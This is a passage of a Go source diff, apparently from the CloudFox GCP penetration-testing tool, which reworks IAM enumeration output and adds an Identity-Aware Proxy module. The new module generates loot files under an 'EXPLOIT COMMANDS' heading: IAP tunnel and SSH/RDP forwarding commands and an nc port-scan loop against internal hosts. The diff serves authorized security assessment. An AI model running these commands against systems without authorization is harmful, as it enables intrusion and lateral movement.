string // AWS, GitHub, GitLab, OIDC, SAML, Azure, etc. + PoolName string + Subject string + Attribute string +} + +// parseFederatedIdentity detects and parses federated identity principals +// Federated identities use principal:// or principalSet:// format +func parseFederatedIdentity(identity string) FederatedIdentityInfo { + info := FederatedIdentityInfo{} + + // Check for principal:// or principalSet:// format + if !strings.HasPrefix(identity, "principal://") && !strings.HasPrefix(identity, "principalSet://") { + return info + } + + info.IsFederated = true + + // Parse the principal URL + // Format: principal://iam.googleapis.com/projects/{project}/locations/global/workloadIdentityPools/{pool}/subject/{subject} + // Or: principalSet://iam.googleapis.com/projects/{project}/locations/global/workloadIdentityPools/{pool}/attribute.{attr}/{value} + + // Extract pool name if present + if strings.Contains(identity, "workloadIdentityPools/") { + parts := strings.Split(identity, "workloadIdentityPools/") + if len(parts) > 1 { + poolParts := strings.Split(parts[1], "/") + if len(poolParts) > 0 { + info.PoolName = poolParts[0] + } + } + } + + // Detect provider type based on common patterns in pool names and attributes + identityLower := strings.ToLower(identity) + + switch { + case strings.Contains(identityLower, "aws") || strings.Contains(identityLower, "amazon"): + info.ProviderType = "AWS" + case strings.Contains(identityLower, "github"): + info.ProviderType = "GitHub" + case strings.Contains(identityLower, "gitlab"): + info.ProviderType = "GitLab" + case strings.Contains(identityLower, "azure") || strings.Contains(identityLower, "microsoft"): + info.ProviderType = "Azure" + case strings.Contains(identityLower, "okta"): + info.ProviderType = "Okta" + case strings.Contains(identityLower, "bitbucket"): + info.ProviderType = "Bitbucket" + case strings.Contains(identityLower, "circleci"): + info.ProviderType = "CircleCI" + case strings.Contains(identity, "attribute."): + 
// Has OIDC attributes but unknown provider + info.ProviderType = "OIDC" + case strings.Contains(identity, "/subject/"): + // Has subject but unknown provider type + info.ProviderType = "Federated" + default: + info.ProviderType = "Federated" + } + + // Extract subject if present + if strings.Contains(identity, "/subject/") { + parts := strings.Split(identity, "/subject/") + if len(parts) > 1 { + info.Subject = parts[1] + } + } + + // Extract attribute and value if present + // Format: .../attribute.{attr}/{value} + if strings.Contains(identity, "/attribute.") { + parts := strings.Split(identity, "/attribute.") + if len(parts) > 1 { + attrParts := strings.Split(parts[1], "/") + if len(attrParts) >= 1 { + info.Attribute = attrParts[0] + } + if len(attrParts) >= 2 { + // The value is the specific identity (e.g., repo name) + info.Subject = attrParts[1] + } + } + } + + return info +} +// formatFederatedInfo formats federated identity info for display +func formatFederatedInfo(info FederatedIdentityInfo) string { + if !info.IsFederated { + return "-" + } + + result := info.ProviderType + + // Show subject (specific identity like repo/workflow) if available + if info.Subject != "" { + result += ": " + info.Subject + } else if info.Attribute != "" { + result += " [" + info.Attribute + "]" + } + + // Add pool name in parentheses + if info.PoolName != "" { + result += " (pool: " + info.PoolName + ")" + } + + return result +} + +// formatCondition formats a condition for display +func formatCondition(condInfo *IAMService.IAMCondition) string { + if condInfo == nil { + return "No" + } + + // Build a meaningful condition summary + parts := []string{} + + if condInfo.Title != "" { + parts = append(parts, condInfo.Title) + } + + // Parse common condition patterns from expression + expr := condInfo.Expression + if expr != "" { + // Check for time-based conditions + if strings.Contains(expr, "request.time") { + if strings.Contains(expr, "timestamp") { + parts = append(parts, 
"[time-limited]") + } + } + // Check for resource-based conditions + if strings.Contains(expr, "resource.name") { + parts = append(parts, "[resource-scoped]") + } + // Check for IP-based conditions + if strings.Contains(expr, "origin.ip") || strings.Contains(expr, "request.origin") { + parts = append(parts, "[IP-restricted]") + } + // Check for device policy + if strings.Contains(expr, "device") { + parts = append(parts, "[device-policy]") + } + } + + if len(parts) == 0 { + return "Yes" + } + + return strings.Join(parts, " ") +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *IAMModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *IAMModule) buildTables() []internal.TableFile { + // New table structure with Scope Type/ID/Name header := []string{ - "Name", - "Principal Type", + "Scope Type", + "Scope ID", + "Scope Name", + "Entry Type", + "Identity", "Role", - "PolicyResourceType", - "PolicyResourceID", + "Admin", + "Custom Role", + "Has Keys", + "Condition", + "MFA", + "Groups", + "Federated", + "SA Attack Paths", } var body [][]string - for _, principal := range g.Data { - for _, binding := range principal.PolicyBindings { - body = append(body, []string{ - principal.Name, - principal.Type, - binding.Role, - principal.ResourceType, - principal.ResourceID, - }) + // Add scope bindings (one row per binding) + for _, sb := range m.ScopeBindings { + // Check admin status from FoxMapper only - shows Org/Folder/Project or No + // This is different from "high privilege roles" - Admin means broad IAM control + adminStatus := gcpinternal.GetAdminStatusFromCache(m.FoxMapperCache, sb.MemberEmail) + if adminStatus == "" { + adminStatus = "No" + } + + isCustom := "No" + if sb.IsCustom { + isCustom = "Yes" + } + + // Format condition + condition := "No" + if 
sb.HasCondition { + condition = formatCondition(sb.ConditionInfo) + } + + // Get MFA status + mfa := "-" + if sb.MemberType == "User" { + if status, ok := m.MFAStatus[sb.MemberEmail]; ok { + if status.Error != "" { + mfa = "Unknown" + } else if status.HasMFA { + mfa = "Yes" + } else { + mfa = "No" + } + } + } else if sb.MemberType == "ServiceAccount" { + mfa = "N/A" + } + + // Get groups this member belongs to + groups := "-" + if memberGroups, ok := m.MemberToGroups[sb.MemberEmail]; ok && len(memberGroups) > 0 { + groups = strings.Join(memberGroups, ", ") + } + + // Check for federated identity + federated := formatFederatedInfo(parseFederatedIdentity(sb.MemberEmail)) + + // Check attack paths for service account principals + attackPaths := "-" + if sb.MemberType == "ServiceAccount" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sb.MemberEmail) + } + + body = append(body, []string{ + sb.ScopeType, + sb.ScopeID, + sb.ScopeName, + sb.MemberType, + sb.MemberEmail, + sb.Role, + adminStatus, + isCustom, + "-", + condition, + mfa, + groups, + federated, + attackPaths, + }) + } + + // Add service accounts + for _, sa := range m.ServiceAccounts { + hasKeys := "No" + if sa.HasKeys { + hasKeys = "Yes" + } + + disabled := "" + if sa.Disabled { + disabled = " (disabled)" + } + + // Get groups this SA belongs to + groups := "-" + if memberGroups, ok := m.MemberToGroups[sa.Email]; ok && len(memberGroups) > 0 { + groups = strings.Join(memberGroups, ", ") + } + + // Check admin status from FoxMapper + adminStatus := gcpinternal.GetAdminStatusFromCache(m.FoxMapperCache, sa.Email) + if adminStatus == "" { + adminStatus = "No" + } + + // Check attack paths for this service account + attackPaths := gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa.Email) + + body = append(body, []string{ + "project", + sa.ProjectID, + m.GetProjectName(sa.ProjectID), + "ServiceAccountInfo", + sa.Email + disabled, + sa.DisplayName, + adminStatus, + "-", + 
hasKeys, + "-", + "N/A", + groups, + "-", // Service accounts are not federated identities + attackPaths, + }) + } + + // Add custom roles + for _, role := range m.CustomRoles { + deleted := "" + if role.Deleted { + deleted = " (deleted)" } + + body = append(body, []string{ + "project", + role.ProjectID, + m.GetProjectName(role.ProjectID), + "CustomRole", + extractRoleName(role.Name) + deleted, + fmt.Sprintf("%s (%d permissions)", role.Title, role.PermissionCount), + "-", + "Yes", + "-", + "-", + "-", + "-", + "-", // Custom roles are not federated identities + "-", // Custom roles don't have attack paths + }) } - tableFile := internal.TableFile{ - Header: header, - Body: body, - Name: globals.GCP_IAM_MODULE_NAME, + // Build tables + tables := []internal.TableFile{ + { + Name: "iam", + Header: header, + Body: body, + }, } - tableFiles = append(tableFiles, tableFile) - return tableFiles + return tables } -// LootFiles can be implemented if needed -func (g GCPIAMResults) LootFiles() []internal.LootFile { - return []internal.LootFile{} +// collectAllLootFiles collects all loot files from all scopes for org-level output. +// This merges loot by name (iam-commands, iam-enumeration) across all scopes. 
+func (m *IAMModule) collectAllLootFiles() []internal.LootFile { + // Merge loot by name across all scopes + mergedLoot := make(map[string]*internal.LootFile) + + // Helper to add loot content + addLoot := func(lootMap map[string]*internal.LootFile) { + for key, loot := range lootMap { + // Key format is "scopeID:lootName" + parts := strings.SplitN(key, ":", 2) + if len(parts) != 2 { + continue + } + lootName := parts[1] + + if mergedLoot[lootName] == nil { + mergedLoot[lootName] = &internal.LootFile{ + Name: lootName, + Contents: "", + } + } + // Avoid duplicate headers + content := loot.Contents + if strings.HasPrefix(content, "# GCP IAM") { + // Skip header if already present + if mergedLoot[lootName].Contents == "" { + // First entry, keep header + } else { + // Strip header from subsequent entries + lines := strings.SplitN(content, "\n\n", 2) + if len(lines) > 1 { + content = lines[1] + } + } + } + mergedLoot[lootName].Contents += content + } + } + + // Add in order: org, folder, project + addLoot(m.OrgLoot) + addLoot(m.FolderLoot) + addLoot(m.ProjectLoot) + + var lootFiles []internal.LootFile + for _, loot := range mergedLoot { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + return lootFiles } -// Houses high-level logic that retrieves IAM information and writes to output -func runGCPIAMCommand(cmd *cobra.Command, args []string) { - // Retrieve projectIDs and resource type from parent (gcp command) ctx - var projectIDs []string - var resourceType string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_IAM_MODULE_NAME) +// collectLootFilesForProject returns loot files for a specific 
project with inheritance. +// This includes org-level loot + ancestor folder loot + project-level loot. +func (m *IAMModule) collectLootFilesForProject(projectID string) []internal.LootFile { + // Get ancestry for this project + var projectOrgID string + var ancestorFolders []string + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + projectOrgID = m.OrgCache.GetProjectOrgID(projectID) + ancestorFolders = m.OrgCache.GetProjectAncestorFolders(projectID) + } + + // Merge loot by name + mergedLoot := make(map[string]*internal.LootFile) + + // Helper to add loot content + addLoot := func(key string, loot *internal.LootFile) { + parts := strings.SplitN(key, ":", 2) + if len(parts) != 2 { + return + } + lootName := parts[1] + + if mergedLoot[lootName] == nil { + mergedLoot[lootName] = &internal.LootFile{ + Name: lootName, + Contents: "", + } + } + // Avoid duplicate headers + content := loot.Contents + if strings.HasPrefix(content, "# GCP IAM") { + if mergedLoot[lootName].Contents == "" { + // First entry, keep header + } else { + // Strip header from subsequent entries + lines := strings.SplitN(content, "\n\n", 2) + if len(lines) > 1 { + content = lines[1] + } + } + } + mergedLoot[lootName].Contents += content + } + + // Add org-level loot + if projectOrgID != "" { + for key, loot := range m.OrgLoot { + if strings.HasPrefix(key, projectOrgID+":") { + addLoot(key, loot) + } + } + } + + // Add ancestor folder loot (in order from top to bottom) + for i := len(ancestorFolders) - 1; i >= 0; i-- { + folderID := ancestorFolders[i] + for key, loot := range m.FolderLoot { + if strings.HasPrefix(key, folderID+":") { + addLoot(key, loot) + } + } + } + + // Add project-level loot + for key, loot := range m.ProjectLoot { + if strings.HasPrefix(key, projectID+":") { + addLoot(key, loot) + } + } + + var lootFiles []internal.LootFile + for _, loot := range mergedLoot { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") 
{ + lootFiles = append(lootFiles, *loot) + } + } + return lootFiles +} + +func (m *IAMModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // Determine org ID - prefer discovered orgs, fall back to hierarchy + orgID := "" + if len(m.OrgIDs) > 0 { + orgID = m.OrgIDs[0] + } else if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + + lootFiles := m.collectAllLootFiles() + tables := m.buildTables() + + // Check if we should use single-pass tee streaming for large datasets + totalRows := 0 + for _, t := range tables { + totalRows += len(t.Body) + } + + if orgID != "" && totalRows >= 50000 { + m.writeHierarchicalOutputTee(ctx, logger, orgID, tables, lootFiles) return } - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_IAM_MODULE_NAME) + // Standard output path for smaller datasets + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), } - // TODO fix once folders or organizations are supported as input for project root - resourceType = "project" + if orgID != "" { + // DUAL OUTPUT: Complete aggregated output at org level + outputData.OrgLevelData[orgID] = IAMOutput{Table: tables, Loot: lootFiles} - // Initialize IAMService and fetch principals with roles for the given projectIDs and resource type - iamService := IAMService.New() - var results []IAMService.PrincipalWithRoles - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving 
IAM information for resource: %s of type %s", projectID, resourceType), globals.GCP_IAM_MODULE_NAME) - principals, err := iamService.PrincipalsWithRoles(projectID, resourceType) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_IAM_MODULE_NAME) - return + // DUAL OUTPUT: Filtered per-project output (with inherited loot) + for _, projectID := range m.ProjectIDs { + projectTables := m.buildTablesForProject(projectID) + projectLoot := m.collectLootFilesForProject(projectID) + if len(projectTables) > 0 && len(projectTables[0].Body) > 0 { + outputData.ProjectLevelData[projectID] = IAMOutput{Table: projectTables, Loot: projectLoot} + } } - results = append(results, principals...) - logger.InfoM(fmt.Sprintf("Done retrieving IAM information for resource: %s of type %s", projectID, resourceType), globals.GCP_IAM_MODULE_NAME) - cloudfoxOutput := GCPIAMResults{Data: results} + } else if len(m.ProjectIDs) > 0 { + // FALLBACK: No org discovered, output complete data to first project + outputData.ProjectLevelData[m.ProjectIDs[0]] = IAMOutput{Table: tables, Loot: lootFiles} + } - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_IAM_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_IAM_MODULE_NAME) - return + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_IAM_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeHierarchicalOutputTee uses single-pass streaming for large datasets. 
+func (m *IAMModule) writeHierarchicalOutputTee(ctx context.Context, logger internal.Logger, orgID string, tables []internal.TableFile, lootFiles []internal.LootFile) { + totalRows := 0 + for _, t := range tables { + totalRows += len(t.Body) + } + logger.InfoM(fmt.Sprintf("Using single-pass tee streaming for %d rows", totalRows), globals.GCP_IAM_MODULE_NAME) + + pathBuilder := m.BuildPathBuilder() + + // Build reverse lookup: for each folder, which projects are under it + folderToProjects := make(map[string][]string) + orgToProjects := make(map[string][]string) + + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + for _, projectID := range m.ProjectIDs { + // Get the org this project belongs to + projectOrgID := m.OrgCache.GetProjectOrgID(projectID) + if projectOrgID != "" { + orgToProjects[projectOrgID] = append(orgToProjects[projectOrgID], projectID) + } + + // Get all ancestor folders for this project + ancestorFolders := m.OrgCache.GetProjectAncestorFolders(projectID) + for _, folderID := range ancestorFolders { + folderToProjects[folderID] = append(folderToProjects[folderID], projectID) + } + } + } + + // Create a row router that routes based on scope type and OrgCache + rowRouter := func(row []string) []string { + // Row format: [ScopeType, ScopeID, ScopeName, ...] 
+ scopeType := row[0] + scopeID := row[1] + + switch scopeType { + case "project": + // Direct project binding - route to that project only + return []string{scopeID} + case "organization": + // Org binding - route to all projects under this org + if projects, ok := orgToProjects[scopeID]; ok { + return projects + } + return m.ProjectIDs + case "folder": + // Folder binding - route to all projects under this folder + if projects, ok := folderToProjects[scopeID]; ok { + return projects + } + return m.ProjectIDs + default: + return nil + } + } + + config := internal.TeeStreamingConfig{ + OrgID: orgID, + ProjectIDs: m.ProjectIDs, + Tables: tables, + LootFiles: lootFiles, + ProjectLootCollector: m.collectLootFilesForProject, + RowRouter: rowRouter, + PathBuilder: pathBuilder, + Format: m.Format, + Verbosity: m.Verbosity, + Wrap: m.WrapTable, + } + + err := internal.HandleHierarchicalOutputTee(config) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing tee streaming output: %v", err), globals.GCP_IAM_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// buildTablesForProject builds tables filtered to only include data for a specific project +func (m *IAMModule) buildTablesForProject(projectID string) []internal.TableFile { + header := []string{ + "Scope Type", + "Scope ID", + "Scope Name", + "Member Type", + "Member", + "Role", + "Admin", + "Custom Role", + "Has Keys", + "Condition", + "MFA", + "Groups", + "Federated", + "SA Attack Paths", + } + + var body [][]string + + // Get ancestry data for this project to include org and folder bindings + var ancestorFolders []string + var projectOrgID string + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + ancestorFolders = m.OrgCache.GetProjectAncestorFolders(projectID) + projectOrgID = m.OrgCache.GetProjectOrgID(projectID) + } + + // Build a set of ancestor folder IDs for quick lookup + ancestorFolderSet := make(map[string]bool) + for _, folderID := range ancestorFolders { + ancestorFolderSet[folderID] = true + } 
+ + // Add scope bindings - include project, org, and ancestor folder bindings + for _, sb := range m.ScopeBindings { + // Check if this binding applies to this project + include := false + switch sb.ScopeType { + case "project": + include = sb.ScopeID == projectID + case "organization": + // Include org bindings if this is the project's org + include = projectOrgID != "" && sb.ScopeID == projectOrgID + case "folder": + // Include folder bindings if folder is in project's ancestry + include = ancestorFolderSet[sb.ScopeID] + } + + if !include { + continue + } + + // Check admin status from FoxMapper only - shows Org/Folder/Project or No + adminStatus := gcpinternal.GetAdminStatusFromCache(m.FoxMapperCache, sb.MemberEmail) + if adminStatus == "" { + adminStatus = "No" + } + + isCustom := "No" + if sb.IsCustom { + isCustom = "Yes" + } + + condition := "No" + if sb.HasCondition { + condition = formatCondition(sb.ConditionInfo) + } + + mfa := "-" + if sb.MemberType == "User" { + if status, ok := m.MFAStatus[sb.MemberEmail]; ok { + if status.Error != "" { + mfa = "Unknown" + } else if status.HasMFA { + mfa = "Yes" + } else { + mfa = "No" + } + } + } else if sb.MemberType == "ServiceAccount" { + mfa = "N/A" + } + + groups := "-" + if memberGroups, ok := m.MemberToGroups[sb.MemberEmail]; ok && len(memberGroups) > 0 { + groups = strings.Join(memberGroups, ", ") + } + + federated := formatFederatedInfo(parseFederatedIdentity(sb.MemberEmail)) + + // Check attack paths for service account principals + attackPaths := "-" + if sb.MemberType == "ServiceAccount" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sb.MemberEmail) + } + + body = append(body, []string{ + sb.ScopeType, + sb.ScopeID, + sb.ScopeName, + sb.MemberType, + sb.MemberEmail, + sb.Role, + adminStatus, + isCustom, + "-", + condition, + mfa, + groups, + federated, + attackPaths, + }) + } + + // Add service accounts for this project only + for _, sa := range m.ServiceAccounts { + if 
sa.ProjectID != projectID { + continue + } + + hasKeys := "No" + if sa.HasKeys { + hasKeys = "Yes" + } + + disabled := "" + if sa.Disabled { + disabled = " (disabled)" + } + + groups := "-" + if memberGroups, ok := m.MemberToGroups[sa.Email]; ok && len(memberGroups) > 0 { + groups = strings.Join(memberGroups, ", ") } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_IAM_MODULE_NAME) + + // Check admin status from FoxMapper + adminStatus := gcpinternal.GetAdminStatusFromCache(m.FoxMapperCache, sa.Email) + if adminStatus == "" { + adminStatus = "No" + } + + // Check attack paths for this service account + attackPaths := gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa.Email) + + body = append(body, []string{ + "project", + sa.ProjectID, + m.GetProjectName(sa.ProjectID), + "ServiceAccountInfo", + sa.Email + disabled, + sa.DisplayName, + adminStatus, + "-", + hasKeys, + "-", + "N/A", + groups, + "-", + attackPaths, + }) + } + + // Add custom roles for this project only + for _, role := range m.CustomRoles { + if role.ProjectID != projectID { + continue + } + + deleted := "" + if role.Deleted { + deleted = " (deleted)" + } + + body = append(body, []string{ + "project", + role.ProjectID, + m.GetProjectName(role.ProjectID), + "CustomRole", + extractRoleName(role.Name) + deleted, + fmt.Sprintf("%s (%d permissions)", role.Title, role.PermissionCount), + "-", + "Yes", + "-", + "-", + "-", + "-", + "-", + "-", // Custom roles don't have attack paths + }) + } + + if len(body) == 0 { + return nil + } + + return []internal.TableFile{ + { + Name: "iam", + Header: header, + Body: body, + }, + } +} + +func (m *IAMModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildTables() + lootFiles := m.collectAllLootFiles() + + // Count security findings for logging + publicAccessFound := false + saWithKeys := 0 + highPrivCount := 0 + + for _, sb := range m.ScopeBindings { + if 
highPrivilegeRoles[sb.Role] { + highPrivCount++ + } + if sb.MemberType == "PUBLIC" || sb.MemberType == "ALL_AUTHENTICATED" { + publicAccessFound = true + } + } + + for _, sa := range m.ServiceAccounts { + if sa.HasKeys { + saWithKeys++ + } + } + + // Log warnings for security findings + if publicAccessFound { + logger.InfoM("[FINDING] Public access (allUsers/allAuthenticatedUsers) detected in IAM bindings!", globals.GCP_IAM_MODULE_NAME) + } + if saWithKeys > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d service account(s) with user-managed keys!", saWithKeys), globals.GCP_IAM_MODULE_NAME) + } + if highPrivCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d high-privilege role binding(s)!", highPrivCount), globals.GCP_IAM_MODULE_NAME) + } + + output := IAMOutput{ + Table: tables, + Loot: lootFiles, + } + + // Determine output scope - use org if available, otherwise fall back to project + var scopeType string + var scopeIdentifiers []string + var scopeNames []string + + if len(m.OrgIDs) > 0 { + // Use organization scope with [O] prefix format + scopeType = "organization" + for _, orgID := range m.OrgIDs { + scopeIdentifiers = append(scopeIdentifiers, orgID) + if name, ok := m.OrgNames[orgID]; ok && name != "" { + scopeNames = append(scopeNames, name) + } else { + scopeNames = append(scopeNames, orgID) + } + } + } else { + // Fall back to project scope + scopeType = "project" + scopeIdentifiers = m.ProjectIDs + for _, id := range m.ProjectIDs { + scopeNames = append(scopeNames, m.GetProjectName(id)) + } + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + scopeType, + scopeIdentifiers, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_IAM_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/iap.go b/gcp/commands/iap.go new file mode 100644 index 00000000..b9fe0229 --- /dev/null +++ 
b/gcp/commands/iap.go @@ -0,0 +1,332 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + iapservice "github.com/BishopFox/cloudfox/gcp/services/iapService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPIAPCommand = &cobra.Command{ + Use: globals.GCP_IAP_MODULE_NAME, + Aliases: []string{"identity-aware-proxy"}, + Short: "Enumerate Identity-Aware Proxy configurations", + Long: `Enumerate Identity-Aware Proxy (IAP) configurations. + +Features: +- Lists IAP tunnel destination groups +- Analyzes IAP settings and bindings +- Identifies overly permissive tunnel configurations +- Checks for public access to IAP resources`, + Run: runGCPIAPCommand, +} + +type IAPModule struct { + gcpinternal.BaseGCPModule + ProjectTunnelDestGroups map[string][]iapservice.TunnelDestGroup // projectID -> groups + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type IAPOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o IAPOutput) TableFiles() []internal.TableFile { return o.Table } +func (o IAPOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPIAPCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_IAP_MODULE_NAME) + if err != nil { + return + } + + module := &IAPModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectTunnelDestGroups: make(map[string][]iapservice.TunnelDestGroup), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *IAPModule) getAllTunnelDestGroups() []iapservice.TunnelDestGroup { + var all []iapservice.TunnelDestGroup + for _, groups := range m.ProjectTunnelDestGroups { + all = append(all, groups...) 
+ } + return all +} + +func (m *IAPModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_IAP_MODULE_NAME, m.processProject) + + allGroups := m.getAllTunnelDestGroups() + if len(allGroups) == 0 { + logger.InfoM("No IAP tunnel destination groups found", globals.GCP_IAP_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d IAP tunnel destination group(s)", + len(allGroups)), globals.GCP_IAP_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *IAPModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating IAP in project: %s", projectID), globals.GCP_IAP_MODULE_NAME) + } + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["iap-commands"] = &internal.LootFile{ + Name: "iap-commands", + Contents: "# IAP Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + svc := iapservice.New() + + // Get tunnel destination groups + groups, err := svc.ListTunnelDestGroups(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAP_MODULE_NAME, + fmt.Sprintf("Could not enumerate IAP tunnel groups in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectTunnelDestGroups[projectID] = groups + for _, group := range groups { + m.addToLoot(projectID, group) + } + m.mu.Unlock() + } +} + +func (m *IAPModule) addToLoot(projectID string, group iapservice.TunnelDestGroup) { + lootFile := m.LootMap[projectID]["iap-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# TUNNEL DESTINATION GROUP: %s\n"+ + "# 
=============================================================================\n"+ + "# Project: %s\n"+ + "# Region: %s\n"+ + "# CIDRs: %s\n"+ + "# FQDNs: %s\n", + group.Name, group.ProjectID, group.Region, + strings.Join(group.CIDRs, ", "), + strings.Join(group.FQDNs, ", "), + ) + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe tunnel destination group: +gcloud iap tcp dest-groups describe %s --region=%s --project=%s + +# List IAM policy for tunnel destination group: +gcloud iap tcp dest-groups get-iam-policy %s --region=%s --project=%s + +# List all IAP tunnel resources in project: +gcloud iap tcp dest-groups list --region=%s --project=%s + +# Check who can use IAP tunnels in this project: +gcloud projects get-iam-policy %s --format=json | jq '.bindings[] | select(.role | contains("iap.tunnelResourceAccessor"))' + +`, group.Name, group.Region, group.ProjectID, + group.Name, group.Region, group.ProjectID, + group.Region, group.ProjectID, + group.ProjectID, + ) + + // === EXPLOIT COMMANDS - IAP Tunnel === + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + + // SSH through IAP tunnel + for _, cidr := range group.CIDRs { + lootFile.Contents += fmt.Sprintf( + "# Start IAP TCP tunnel to hosts in CIDR %s:\n"+ + "gcloud compute start-iap-tunnel INSTANCE_NAME 22 --local-host-port=localhost:2222 --zone=ZONE --project=%s\n"+ + "ssh -p 2222 localhost\n\n", + cidr, group.ProjectID, + ) + } + + for _, fqdn := range group.FQDNs { + lootFile.Contents += fmt.Sprintf( + "# Start IAP TCP tunnel to %s:\n"+ + "gcloud compute start-iap-tunnel INSTANCE_NAME 22 --local-host-port=localhost:2222 --zone=ZONE --project=%s\n"+ + "ssh -p 2222 localhost\n\n", + fqdn, group.ProjectID, + ) + } + + lootFile.Contents += fmt.Sprintf( + "# SSH to a compute instance through IAP (direct):\n"+ + "gcloud compute ssh INSTANCE_NAME --tunnel-through-iap --zone=ZONE --project=%s\n\n"+ + "# Forward RDP through IAP (Windows instances):\n"+ + "gcloud compute 
start-iap-tunnel INSTANCE_NAME 3389 --local-host-port=localhost:3389 --zone=ZONE --project=%s\n\n"+ + "# Forward arbitrary port through IAP:\n"+ + "gcloud compute start-iap-tunnel INSTANCE_NAME 8080 --local-host-port=localhost:8080 --zone=ZONE --project=%s\n\n"+ + "# Port scan through IAP tunnel (test internal connectivity):\n"+ + "for PORT in 22 80 443 3306 5432 8080 8443; do\n"+ + " gcloud compute start-iap-tunnel INSTANCE_NAME $PORT --local-host-port=localhost:$PORT --zone=ZONE --project=%s &\n"+ + " sleep 1 && nc -z localhost $PORT 2>/dev/null && echo \"Port $PORT is open\" || echo \"Port $PORT is closed\"\n"+ + " kill %%1 2>/dev/null\n"+ + "done\n\n", + group.ProjectID, + group.ProjectID, + group.ProjectID, + group.ProjectID, + ) +} + +func (m *IAPModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *IAPModule) getHeader() []string { + return []string{ + "Project", + "Name", + "Region", + "CIDRs", + "FQDNs", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +func (m *IAPModule) groupsToTableBody(groups []iapservice.TunnelDestGroup) [][]string { + var body [][]string + for _, 